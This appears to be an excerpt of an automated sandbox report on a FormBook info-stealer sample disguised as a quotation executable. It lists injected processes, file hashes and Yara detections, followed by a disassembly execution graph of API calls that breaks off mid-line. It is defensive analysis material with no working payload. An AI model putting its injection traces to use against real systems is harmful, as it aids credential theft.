                                                                    Path:C:\Users\user\Desktop\QUOTATON-37839993.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\QUOTATON-37839993.exe"
                                                                    Imagebase:0xe00000
                                                                    File size:1'226'240 bytes
                                                                    MD5 hash:4FFF9AD3CCF6625DC0287E4BA41F0184
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:04:04:34
                                                                    Start date:06/12/2024
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\QUOTATON-37839993.exe"
                                                                    Imagebase:0x60000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2590442326.0000000003490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:04:05:07
                                                                    Start date:06/12/2024
                                                                    Path:C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe"
                                                                    Imagebase:0x230000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4008647896.0000000002CC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:13
                                                                    Start time:04:05:09
                                                                    Start date:06/12/2024
                                                                    Path:C:\Windows\SysWOW64\comp.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\comp.exe"
                                                                    Imagebase:0x650000
                                                                    File size:23'552 bytes
                                                                    MD5 hash:712EF348F7032AA1C80D24600BA5452D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4008790036.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:14
                                                                    Start time:04:05:22
                                                                    Start date:06/12/2024
                                                                    Path:C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe"
                                                                    Imagebase:0x230000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:15
                                                                    Start time:04:05:34
                                                                    Start date:06/12/2024
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff728280000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:3.7%
                                                                      Dynamic/Decrypted Code Coverage:1.3%
                                                                      Signature Coverage:8.7%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:62
                                                                      execution_graph 104376 e3fe27 104389 e1f944 104376->104389 104378 e3fe3d 104379 e3fe53 104378->104379 104380 e3febe 104378->104380 104478 e09e5d 60 API calls 104379->104478 104398 e0fce0 104380->104398 104382 e3fe92 104383 e4089c 104382->104383 104384 e3fe9a 104382->104384 104480 e69e4a 89 API calls 4 library calls 104383->104480 104479 e6834f 59 API calls Mailbox 104384->104479 104388 e3feb2 Mailbox 104390 e1f950 104389->104390 104391 e1f962 104389->104391 104481 e09d3c 60 API calls Mailbox 104390->104481 104393 e1f991 104391->104393 104394 e1f968 104391->104394 104492 e09d3c 60 API calls Mailbox 104393->104492 104482 e20db6 104394->104482 104397 e1f95a 104397->104378 104521 e08180 104398->104521 104400 e0fd3d 104402 e4472d 104400->104402 104463 e106f6 104400->104463 104526 e0f234 104400->104526 104644 e69e4a 89 API calls 4 library calls 104402->104644 104405 e4488d 104411 e0fe4c 104405->104411 104456 e44742 104405->104456 104650 e7a2d9 85 API calls Mailbox 104405->104650 104406 e0fe3e 104406->104405 104406->104411 104648 e566ec 59 API calls 2 library calls 104406->104648 104407 e10517 104417 e20db6 Mailbox 59 API calls 104407->104417 104408 e44b53 104408->104456 104669 e69e4a 89 API calls 4 library calls 104408->104669 104410 e20db6 59 API calls Mailbox 104423 e0fdd3 104410->104423 104411->104408 104418 e448f9 104411->104418 104530 e0837c 104411->104530 104412 e447d7 104412->104456 104646 e69e4a 89 API calls 4 library calls 104412->104646 104414 e44848 104649 e560ef 59 API calls 2 library calls 104414->104649 104430 e10545 _memmove 104417->104430 104428 e44917 104418->104428 104652 e085c0 59 API calls Mailbox 104418->104652 104421 e44755 104421->104412 104645 e0f6a3 331 API calls 104421->104645 104423->104406 104423->104407 104423->104410 104423->104421 104423->104430 104450 e4480c 104423->104450 104423->104456 104618 e09ea0 104423->104618 104424 e0fea4 104433 e44ad6 104424->104433 104434 e0ff32 104424->104434 104472 e10179 Mailbox _memmove 104424->104472 104425 e4486b 104429 e09ea0 331 API calls 104425->104429 104426 e448b2 Mailbox 104426->104411 104651 e566ec 59 API calls 2 library calls 104426->104651 104432 e44928 104428->104432 104653 e085c0 59 API calls Mailbox 104428->104653 104429->104405 104435 e20db6 Mailbox 59 API calls 104430->104435 104432->104472 104654 e560ab 59 API calls Mailbox 104432->104654 104663 e69ae7 60 API calls 104433->104663 104438 e20db6 Mailbox 59 API calls 104434->104438 104476 e10106 _memmove 104435->104476 104443 e0ff39 104438->104443 104442 e44a4d 104444 e09ea0 331 API calls 104442->104444 104443->104463 104537 e109d0 104443->104537 104446 e44a87 104444->104446 104446->104456 104658 e084c0 104446->104658 104447 e0ffe6 104462 e10007 104447->104462 104664 e08047 104447->104664 104449 e0ffb2 104449->104430 104449->104447 104449->104463 104647 e69e4a 89 API calls 4 library calls 104450->104647 104454 e44ab2 104662 e69e4a 89 API calls 4 library calls 104454->104662 104461 e10398 104461->104388 104462->104463 104465 e44b24 104462->104465 104467 e1004c 104462->104467 104643 e69e4a 89 API calls 4 library calls 104463->104643 104464 e20db6 59 API calls Mailbox 104464->104472 104668 e09d3c 60 API calls Mailbox 104465->104668 104467->104408 104467->104463 104468 e100d8 104467->104468 104614 e09d3c 60 API calls Mailbox 104468->104614 104470 e44a1c 104473 e20db6 Mailbox 59 API calls 104470->104473 104471 e100eb 104471->104463 104615 e082df 59 API calls Mailbox 104471->104615 104472->104442 104472->104454 104472->104461 104472->104463 104472->104464 104472->104470 104616 e08740 68 API calls __cinit 104472->104616 104617 e08660 68 API calls 104472->104617 104655 e65937 68 API calls 104472->104655 104656 e089b3 69 API calls Mailbox 104472->104656 104657 e09d3c 60 API calls Mailbox 104472->104657 104473->104442 104476->104472 104477 e10162 104476->104477 104642 e09c90 59 API calls Mailbox 104476->104642 104477->104388 104478->104382 104479->104388 104480->104388 104481->104397 104483 e20dbe 104482->104483 104485 e20dd8 104483->104485 104487 e20ddc std::exception::exception 104483->104487 104493 e2571c 104483->104493 104510 e233a1 DecodePointer 104483->104510 104485->104397 104511 e2859b RaiseException 104487->104511 104489 e20e06 104512 e284d1 58 API calls _free 104489->104512 104491 e20e18 104491->104397 104492->104397 104494 e25797 104493->104494 104502 e25728 104493->104502 104519 e233a1 DecodePointer 104494->104519 104496 e2579d 104520 e28b28 58 API calls __getptd_noexit 104496->104520 104499 e2575b RtlAllocateHeap 104499->104502 104509 e2578f 104499->104509 104501 e25783 104517 e28b28 58 API calls __getptd_noexit 104501->104517 104502->104499 104502->104501 104506 e25733 104502->104506 104507 e25781 104502->104507 104516 e233a1 DecodePointer 104502->104516 104506->104502 104513 e2a16b 58 API calls 2 library calls 104506->104513 104514 e2a1c8 58 API calls 7 library calls 104506->104514 104515 e2309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104506->104515 104518 e28b28 58 API calls __getptd_noexit 104507->104518 104509->104483 104510->104483 104511->104489 104512->104491 104513->104506 104514->104506 104516->104502 104517->104507 104518->104509 104519->104496 104520->104509 104522 e0818f 104521->104522 104525 e081aa 104521->104525 104670 e07e4f 104522->104670 104524 e08197 CharUpperBuffW 104524->104525 104525->104400 104527 e0f251 104526->104527 104529 e0f272 104527->104529 104674 e69e4a 89 API calls 4 library calls 104527->104674 104529->104423 104531 e0838d 104530->104531 104532 e3edbd 104530->104532 104533 e20db6 Mailbox 59 API calls 104531->104533 104534 e08394 104533->104534 104535 e083b5 104534->104535 104675 e08634 59 API calls Mailbox 104534->104675 104535->104418 104535->104424 104538 e44cc3 104537->104538 104549 e109f5 104537->104549 104735 e69e4a 89 API calls 4 library calls 104538->104735 104540 e10cfa 104540->104449 104542 e10ee4 104542->104540 104544 e10ef1 104542->104544 104733 e11093 331 API calls Mailbox 104544->104733 104545 e10a4b PeekMessageW 104608 e10a05 Mailbox 104545->104608 104547 e10ef8 LockWindowUpdate DestroyWindow GetMessageW 104547->104540 104551 e10f2a 104547->104551 104549->104608 104736 e09e5d 60 API calls 104549->104736 104737 e56349 331 API calls 104549->104737 104550 e44e81 Sleep 104550->104608 104554 e45c58 TranslateMessage DispatchMessageW GetMessageW 104551->104554 104552 e10ce4 104552->104540 104732 e11070 10 API calls Mailbox 104552->104732 104554->104554 104555 e45c88 104554->104555 104555->104540 104556 e10e43 PeekMessageW 104556->104608 104557 e10ea5 TranslateMessage DispatchMessageW 104557->104556 104558 e44d50 TranslateAcceleratorW 104558->104556 104558->104608 104559 e10d13 timeGetTime 104559->104608 104560 e4581f WaitForSingleObject 104563 e4583c GetExitCodeProcess CloseHandle 104560->104563 104560->104608 104595 e10f95 104563->104595 104564 e10e5f Sleep 104598 e10e70 Mailbox 104564->104598 104565 e08047 59 API calls 104565->104608 104566 e45af8 Sleep 104566->104598 104568 e20db6 59 API calls Mailbox 104568->104608 104570 e2049f timeGetTime 104570->104598 104571 e10f4e timeGetTime 104734 e09e5d 60 API calls 104571->104734 104574 e45b8f GetExitCodeProcess 104578 e45ba5 WaitForSingleObject 104574->104578 104579 e45bbb CloseHandle 104574->104579 104576 e85f25 110 API calls 104576->104598 104577 e0b7dd 109 API calls 104577->104598 104578->104579 104578->104608 104579->104598 104582 e45874 104582->104595 104583 e45078 Sleep 104583->104608 104584 e45c17 Sleep 104584->104608 104589 e09e5d 60 API calls 104589->104608 104593 e0fce0 304 API calls 104593->104608 104595->104449 104597 e07de1 59 API calls 104597->104608 104598->104570 104598->104574 104598->104576 104598->104577 104598->104582 104598->104583 104598->104584 104598->104595 104598->104608 104762 e07667 104598->104762 104767 e62408 60 API calls 104598->104767 104768 e09e5d 60 API calls 104598->104768 104769 e07de1 104598->104769 104773 e089b3 69 API calls Mailbox 104598->104773 104774 e0b73c 331 API calls 104598->104774 104775 e564da 60 API calls 104598->104775 104776 e65244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104598->104776 104777 e63c55 66 API calls Mailbox 104598->104777 104600 e69e4a 89 API calls 104600->104608 104601 e09c90 59 API calls Mailbox 104601->104608 104602 e0b73c 304 API calls 104602->104608 104603 e09ea0 304 API calls 104603->104608 104604 e084c0 69 API calls 104604->104608 104606 e5617e 59 API calls Mailbox 104606->104608 104607 e089b3 69 API calls 104607->104608 104608->104545 104608->104550 104608->104552 104608->104556 104608->104557 104608->104558 104608->104559 104608->104560 104608->104564 104608->104565 104608->104566 104608->104568 104608->104571 104608->104589 104608->104593 104608->104595 104608->104597 104608->104598 104608->104600 104608->104601 104608->104602 104608->104603 104608->104604 104608->104606 104608->104607 104609 e455d5 VariantClear 104608->104609 104610 e4566b VariantClear 104608->104610 104611 e45419 VariantClear 104608->104611 104612 e08cd4 59 API calls Mailbox 104608->104612 104613 e56e8f 59 API calls 104608->104613 104676 e0e6a0 104608->104676 104707 e0f460 104608->104707 104726 e031ce 104608->104726 104731 e0e420 331 API calls 104608->104731 104738 e86018 59 API calls 104608->104738 104739 e69a15 59 API calls Mailbox 104608->104739 104740 e5d4f2 59 API calls 104608->104740 104741 e09837 104608->104741 104759 e560ef 59 API calls 2 library calls 104608->104759 104760 e08401 59 API calls 104608->104760 104761 e082df 59 API calls Mailbox 104608->104761 104609->104608 104610->104608 104611->104608 104612->104608 104613->104608 104614->104471 104615->104476 104616->104472 104617->104472 104619 e09ebf 104618->104619 104637 e09eed Mailbox 104618->104637 104620 e20db6 Mailbox 59 API calls 104619->104620 104620->104637 104621 e22d40 67 API calls __cinit 104621->104637 104622 e0b475 104623 e08047 59 API calls 104622->104623 104631 e0a057 104623->104631 104624 e0b47a 104626 e409e5 104624->104626 104627 e40055 104624->104627 104625 e20db6 59 API calls Mailbox 104625->104637 105871 e69e4a 89 API calls 4 library calls 104626->105871 105868 e69e4a 89 API calls 4 library calls 104627->105868 104631->104423 104632 e40064 104632->104423 104634 e08047 59 API calls 104634->104637 104635 e07667 59 API calls 104635->104637 104637->104621 104637->104622 104637->104624 104637->104625 104637->104627 104637->104631 104637->104634 104637->104635 104638 e56e8f 59 API calls 104637->104638 104639 e409d6 104637->104639 104641 e0a55a 104637->104641 105851 e0b900 104637->105851 105867 e0c8c0 331 API calls 2 library calls 104637->105867 104638->104637 105870 e69e4a 89 API calls 4 library calls 104639->105870 105869 e69e4a 89 API calls 4 library calls 104641->105869 104642->104476 104643->104402 104644->104456 104645->104412 104646->104456 104647->104456 104648->104414 104649->104425 104650->104426 104651->104426 104652->104428 104653->104432 104654->104472 104655->104472 104656->104472 104657->104472 104659 e084cb 104658->104659 104661 e084f2 104659->104661 105877 e089b3 69 API calls Mailbox 104659->105877 104661->104454 104662->104456 104663->104447 104665 e08052 104664->104665 104666 e0805a 104664->104666 105878 e07f77 59 API calls 2 library calls 104665->105878 104666->104462 104668->104408 104669->104456 104671 e07e62 104670->104671 104673 e07e5f _memmove 104670->104673 104672 e20db6 Mailbox 59 API calls 104671->104672 104672->104673 104673->104524 104674->104529 104675->104535 104677 e0e6d5 104676->104677 104678 e43aa9 104677->104678 104681 e0e73f 104677->104681 104691 e0e799 104677->104691 104679 e09ea0 331 API calls 104678->104679 104680 e43abe 104679->104680 104706 e0e970 Mailbox 104680->104706 104779 e69e4a 89 API calls 4 library calls 104680->104779 104684 e07667 59 API calls 104681->104684 104681->104691 104682 e07667 59 API calls 104682->104691 104685 e43b04 104684->104685 104780 e22d40 104685->104780 104686 e22d40 __cinit 67 API calls 104686->104691 104688 e43b26 104688->104608 104689 e69e4a 89 API calls 104689->104706 104690 e084c0 69 API calls 104690->104706 104691->104682 104691->104686 104691->104688 104692 e0e95a 104691->104692 104691->104706 104692->104706 104783 e69e4a 89 API calls 4 library calls 104692->104783 104695 e09ea0 331 API calls 104695->104706 104699 e08d40 59 API calls 104699->104706 104703 e43e25 104703->104608 104704 e0f195 104787 e69e4a 89 API calls 4 library calls 104704->104787 104705 e0ea78 104705->104608 104706->104689 104706->104690 104706->104695 104706->104699 104706->104704 104706->104705 104778 e07f77 59 API calls 2 library calls 104706->104778 104784 e56e8f 59 API calls 104706->104784 104785 e7c5c3 331 API calls 104706->104785 104786 e7b53c 331 API calls Mailbox 104706->104786 104788 e09c90 59 API calls Mailbox 104706->104788 104789 e793c6 331 API calls Mailbox 104706->104789 104708 e0f650 104707->104708 104709 e0f4ba 104707->104709 104712 e07de1 59 API calls 104708->104712 104710 e0f4c6 104709->104710 104711 e4441e 104709->104711 104966 e0f290 331 API calls 2 library calls 104710->104966 104968 e7bc6b 104711->104968 104718 e0f58c Mailbox 104712->104718 104715 e4442c 104719 e0f630 104715->104719 105008 e69e4a 89 API calls 4 library calls 104715->105008 104717 e0f4fd 104717->104715 104717->104718 104717->104719 104868 e04e4a 104718->104868 104874 e7445a 104718->104874 104883 e6cb7a 104718->104883 104963 e63c37 104718->104963 104719->104608 104721 e0f5e3 104721->104719 104967 e09c90 59 API calls Mailbox 104721->104967 104727 e03212 104726->104727 104729 e031e0 104726->104729 104727->104608 104728 e03205 IsDialogMessageW 104728->104727 104728->104729 104729->104727 104729->104728 104730 e3cf32 GetClassLongW 104729->104730 104730->104728 104730->104729 104731->104608 104732->104542 104733->104547 104734->104608 104735->104549 104736->104549 104737->104549 104738->104608 104739->104608 104740->104608 104742 e09851 104741->104742 104751 e0984b 104741->104751 104743 e09857 __itow 104742->104743 104744 e09899 104742->104744 104746 e3f5d3 __i64tow 104742->104746 104747 e3f4da 104742->104747 104749 e20db6 Mailbox 59 API calls 104743->104749 105849 e23698 83 API calls 3 library calls 104744->105849 104746->104746 104752 e20db6 Mailbox 59 API calls 104747->104752 104757 e3f552 Mailbox _wcscpy 104747->104757 104750 e09871 104749->104750 104750->104751 104753 e07de1 59 API calls 104750->104753 104751->104608 104755 e3f51f 104752->104755 104753->104751 104754 e20db6 Mailbox 59 API calls 104756 e3f545 104754->104756 104755->104754 104756->104757 104758 e07de1 59 API calls 104756->104758 105850 e23698 83 API calls 3 library calls 104757->105850 104758->104757 104759->104608 104760->104608 104761->104608 104763 e20db6 Mailbox 59 API calls 104762->104763 104764 e07688 104763->104764 104765 e20db6 Mailbox 59 API calls 104764->104765 104766 e07696 104765->104766 104766->104598 104767->104598 104768->104598 104770 e07df0 __NMSG_WRITE _memmove 104769->104770 104771 e20db6 Mailbox 59 API calls 104770->104771 104772 e07e2e 104771->104772 104772->104598 104773->104598 104774->104598 104775->104598 104776->104598 104777->104598 104778->104706 104779->104706 104790 e22c44 104780->104790 104782 e22d4b 104782->104691 104783->104706 104784->104706 104785->104706 104786->104706 104787->104703 104788->104706 104789->104706 104791 e22c50 __close 104790->104791 104798 e23217 104791->104798 104797 e22c77 __close 104797->104782 104815 e29c0b 104798->104815 104800 e22c59 104801 e22c88 DecodePointer DecodePointer 104800->104801 104802 e22c65 104801->104802 104803 e22cb5 104801->104803 104812 e22c82 104802->104812 104803->104802 104861 e287a4 59 API calls __close 104803->104861 104805 e22d18 EncodePointer EncodePointer 104805->104802 104806 e22cec 104806->104802 104811 e22d06 EncodePointer 104806->104811 104863 e28864 61 API calls 2 library calls 104806->104863 104807 e22cc7 104807->104805 104807->104806 104862 e28864 61 API calls 2 library calls 104807->104862 104810 e22d00 104810->104802 104810->104811 104811->104805 104864 e23220 104812->104864 104816 e29c2f EnterCriticalSection 104815->104816 104817 e29c1c 104815->104817 104816->104800 104822 e29c93 104817->104822 104819 e29c22 104819->104816 104846 e230b5 58 API calls 3 library calls 104819->104846 104823 e29c9f __close 104822->104823 104824 e29cc0 104823->104824 104825 e29ca8 104823->104825 104833 e29ce1 __close 104824->104833 104850 e2881d 58 API calls __malloc_crt 104824->104850 104847 e2a16b 58 API calls 2 library calls 104825->104847 104828 e29cad 104848 e2a1c8 58 API calls 7 library calls 104828->104848 104829 e29cd5 104831 e29ceb 104829->104831 104832 e29cdc 104829->104832 104837 e29c0b __lock 58 API calls 104831->104837 104851 e28b28 58 API calls __getptd_noexit 104832->104851 104833->104819 104834 e29cb4 104849 e2309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104834->104849 104839 e29cf2 104837->104839 104840 e29d17 104839->104840 104841 e29cff 104839->104841 104853 e22d55 104840->104853 104852 e29e2b InitializeCriticalSectionAndSpinCount 104841->104852 104844 e29d0b 104859 e29d33 LeaveCriticalSection _doexit 104844->104859 104847->104828 104848->104834 104850->104829 104851->104833 104852->104844 104854 e22d87 _free 104853->104854 104855 e22d5e RtlFreeHeap 104853->104855 104854->104844 104855->104854 104856 e22d73 104855->104856 104860 e28b28 58 API calls __getptd_noexit 104856->104860 104858 e22d79 GetLastError 104858->104854 104859->104833 104860->104858 104861->104807 104862->104806 104863->104810 104867 e29d75 LeaveCriticalSection 104864->104867 104866 e22c87 104866->104797 104867->104866 104869 e04e54 104868->104869 104870 e04e5b 104868->104870 105009 e253a6 104869->105009 104872 e04e6a 104870->104872 104873 e04e7b FreeLibrary 104870->104873 104872->104721 104873->104872 104875 e09837 84 API calls 104874->104875 104876 e74494 104875->104876 105279 e06240 104876->105279 104878 e744a4 104879 e744c9 104878->104879 104880 e09ea0 331 API calls 104878->104880 104882 e744cd 104879->104882 105304 e09a98 59 API calls Mailbox 104879->105304 104880->104879 104882->104721 104884 e07667 59 API calls 104883->104884 104885 e6cbaf 104884->104885 104886 e07667 59 API calls 104885->104886 104887 e6cbb8 104886->104887 104888 e6cbcc 104887->104888 105523 e09b3c 59 API calls 104887->105523 104890 e09837 84 API calls 104888->104890 104891 e6cbe9 104890->104891 104892 e6ccea 104891->104892 104893 e6cc0b 104891->104893 104905 e6cd1a Mailbox 104891->104905 105327 e04ddd 104892->105327 104894 e09837 84 API calls 104893->104894 104896 e6cc17 104894->104896 104898 e08047 59 API calls 104896->104898 104901 e6cc23 104898->104901 104899 e6cd16 104900 e07667 59 API calls 104899->104900 104899->104905 104903 e6cd4b 104900->104903 104907 e6cc37 104901->104907 104908 e6cc69 104901->104908 104902 e04ddd 136 API calls 104902->104899 104904 e07667 59 API calls 104903->104904 104906 e6cd54 104904->104906 104905->104721 104910 e07667 59 API calls 104906->104910 104911 e08047 59 API calls 104907->104911 104909 e09837 84 API calls 104908->104909 104912 e6cc76 104909->104912 104913 e6cd5d 104910->104913 104914 e6cc47 104911->104914 104915 e08047 59 API calls 104912->104915 104916 e07667 59 API calls 104913->104916 105524 e07cab 104914->105524 104918 e6cc82 104915->104918 104919 e6cd66 104916->104919 105531 e64a31 GetFileAttributesW 104918->105531 104923 e09837 84 API calls 104919->104923 104921 e09837 84 API calls 104924 e6cc5d 104921->104924 104926 e6cd73 104923->104926 104927 e07b2e 59 API calls 104924->104927 104925 e6cc8b 104928 e6cc9e 104925->104928 104931 e079f2 59 API calls 104925->104931 105351 e0459b 104926->105351 104927->104908 104930 e09837 84 API calls 104928->104930 104938 e6cca4 104928->104938 104933 e6cccb 104930->104933 104931->104928 104932 e6cd8e 105402 e079f2 104932->105402 105532 e637ef 75 API calls Mailbox 104933->105532 104937 e6cdd1 104940 e08047 59 API calls 104937->104940 104938->104905 104939 e079f2 59 API calls 104941 e6cdae 104939->104941 104942 e6cddf 104940->104942 104941->104937 105533 e07bcc 104941->105533 105405 e07b2e 104942->105405 104946 e6cdc3 104948 e07bcc 59 API calls 104946->104948 104947 e07b2e 59 API calls 104949 e6cdfb 104947->104949 104948->104937 104950 e07b2e 59 API calls 104949->104950 104951 e6ce09 104950->104951 104952 e09837 84 API calls 104951->104952 104953 e6ce15 104952->104953 105414 e64071 104953->105414 104955 e6ce26 104956 e63c37 3 API calls 104955->104956 104957 e6ce30 104956->104957 104958 e09837 84 API calls 104957->104958 104962 e6ce61 104957->104962 104959 e6ce4e 104958->104959 105468 e69155 104959->105468 104961 e04e4a 84 API calls 104961->104905 104962->104961 105837 e6445a GetFileAttributesW 104963->105837 104966->104717 104967->104721 104969 e7bc96 104968->104969 104970 e7bcb0 104968->104970 105841 e69e4a 89 API calls 4 library calls 104969->105841 105842 e7a213 59 API calls Mailbox 104970->105842 104973 e7bcbb 104974 e09ea0 330 API calls 104973->104974 104975 e7bd1c 104974->104975 104976 e7bca8 Mailbox 104975->104976 104977 e7bdae 104975->104977 104980 e7bd5d 104975->104980 104976->104715 104978 e7be04 104977->104978 104979 e7bdb4 104977->104979 104978->104976 104981 e09837 84 API calls 104978->104981 105844 e6791a 59 API calls 104979->105844 105843 e672df 59 API calls Mailbox 104980->105843 104983 e7be16 104981->104983 104986 e07e4f 59 API calls 104983->104986 104984 e7bdd7 105845 e05d41 59 API calls Mailbox 104984->105845 104987 e7be3a CharUpperBuffW 104986->104987 104992 e7be54 104987->104992 104989 e7bd8d 104991 e0f460 330 API calls 104989->104991 104990 e7bddf Mailbox 104995 e0fce0 330 API calls 104990->104995 104991->104976 104993 e7bea7 104992->104993 104994 e7be5b 104992->104994 104996 e09837 84 API calls 104993->104996 105846 e672df 59 API calls Mailbox 104994->105846 104995->104976 104997 e7beaf 104996->104997 105847 e09e5d 60 API calls 104997->105847 105000 e7be89 105001 e0f460 330 API calls 105000->105001 105001->104976 105002 e7beb9 105002->104976 105003 e09837 84 API calls 105002->105003 105004 e7bed4 105003->105004 105848 e05d41 59 API calls Mailbox 105004->105848 105006 e7bee4 105007 e0fce0 330 API calls 105006->105007 105007->104976 105008->104719 105010 e253b2 __close 105009->105010 105011 e253c6 105010->105011 105012 e253de 105010->105012 105044 e28b28 58 API calls __getptd_noexit 105011->105044 105019 e253d6 __close 105012->105019 105022 e26c11 105012->105022 105014 e253cb 105045 e28db6 9 API calls __close 105014->105045 105019->104870 105023 e26c43 EnterCriticalSection 105022->105023 105024 e26c21 105022->105024 105026 e253f0 105023->105026 105024->105023 105025 e26c29 105024->105025 105027 e29c0b __lock 58 API calls 105025->105027 105028 e2533a 105026->105028 105027->105026 105029 e25349 105028->105029 105030 e2535d 105028->105030 105090 e28b28 58 API calls __getptd_noexit 105029->105090 105042 e25359 105030->105042 105047 e24a3d 105030->105047 105033 e2534e 105091 e28db6 9 API calls __close 105033->105091 105039 e25377 105064 e30a02 105039->105064 105041 e2537d 105041->105042 105043 e22d55 _free 58 API calls 105041->105043 105046 e25415 LeaveCriticalSection LeaveCriticalSection __wfsopen 105042->105046 105043->105042 105044->105014 105045->105019 105046->105019 105048 e24a50 105047->105048 105052 e24a74 105047->105052 105049 e246e6 __output_l 58 API calls 105048->105049 105048->105052 105050 e24a6d 105049->105050 105092 e2d886 105050->105092 105053 e30b77 105052->105053 105054 e25371 105053->105054 105055 e30b84 105053->105055 105057 e246e6 105054->105057 105055->105054 105056 e22d55 _free 58 API calls 105055->105056 105056->105054 105058 e246f0 105057->105058 105059 e24705 105057->105059 105234 e28b28 58 API calls __getptd_noexit 105058->105234 105059->105039 105061 e246f5 105235 e28db6 9 API calls __close 105061->105235 105063 e24700 105063->105039 105065 e30a0e __close 105064->105065 105066 e30a32 105065->105066 105067 e30a1b 105065->105067 105069 e30abd 105066->105069 105071 e30a42 105066->105071 105251 e28af4 58 API calls __getptd_noexit 105067->105251 105256 e28af4 58 API calls __getptd_noexit 105069->105256 105070 e30a20 105252 e28b28 58 API calls __getptd_noexit 105070->105252 105074 e30a60 105071->105074 105075 e30a6a 105071->105075 105253 e28af4 58 API calls __getptd_noexit 105074->105253 105078 e2d206 ___lock_fhandle 59 API calls 105075->105078 105076 e30a65 105257 e28b28 58 API calls __getptd_noexit 105076->105257 105079 e30a70 105078->105079 105081 e30a83 105079->105081 105082 e30a8e 105079->105082 105236 e30add 105081->105236 105254 e28b28 58 API calls __getptd_noexit 105082->105254 105083 e30ac9 105258 e28db6 9 API calls __close 105083->105258 105086 e30a27 __close 105086->105041 105088 e30a89 105255 e30ab5 LeaveCriticalSection __unlock_fhandle 105088->105255 105090->105033 105091->105042 105093 e2d892 __close 105092->105093 105094 e2d8b6 105093->105094 105095 e2d89f 105093->105095 105097 e2d955 105094->105097 105099 e2d8ca 105094->105099 105193 e28af4 58 API calls __getptd_noexit 105095->105193 105199 e28af4 58 API calls __getptd_noexit 105097->105199 105098 e2d8a4 105194 e28b28 58 API calls __getptd_noexit 105098->105194 105102 e2d8f2 105099->105102 105103 e2d8e8 105099->105103 105120 e2d206 105102->105120 105195 e28af4 58 API calls __getptd_noexit 105103->105195 105106 e2d8ed 105200 e28b28 58 API calls __getptd_noexit 105106->105200 105107 